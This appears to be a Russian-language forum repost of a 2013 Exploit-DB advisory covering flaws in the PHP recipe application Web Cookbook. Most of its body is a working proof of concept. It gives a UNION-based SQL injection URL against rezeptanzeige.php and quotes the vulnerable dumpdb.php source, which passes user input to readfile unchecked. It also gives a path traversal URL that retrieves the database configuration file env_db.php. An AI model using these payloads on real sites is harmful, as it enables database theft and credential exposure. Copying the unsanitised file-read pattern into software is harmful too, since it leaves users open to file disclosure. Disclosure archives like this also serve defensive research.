- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24531
- Проверка EDB
-
- Пройдено
- Автор
- CR4WL3R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2013-02-21
Web Cookbook - Multiple Vulnerabilities
Код:
# Web Cookbook Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# Script: http://sourceforge.net/projects/webcookbook/
# Tested: Win 7
# Proof of Concept
# SQL Injection
http://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi]
http://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--
# Remote File Disclosure
# Bugs found /admin/dumpdb.php
--------------------------
1 <?php
2 $outfile = $_GET['outfile'];
3 header("Content-Type: text/plain");
4 header("Content-length: " . filesize("../upload/" . $outfile));
5 header("Content-Disposition: attachment; filename=" . $outfile);
6 readfile("../upload/" . $outfile);
7 ?>
--------------------------
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file]
http://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php
# Demo:
http://bastardlabs.info/demo/WebCookbook1.png
http://bastardlabs.info/demo/WebCookbook2.png- Источник
- www.exploit-db.com
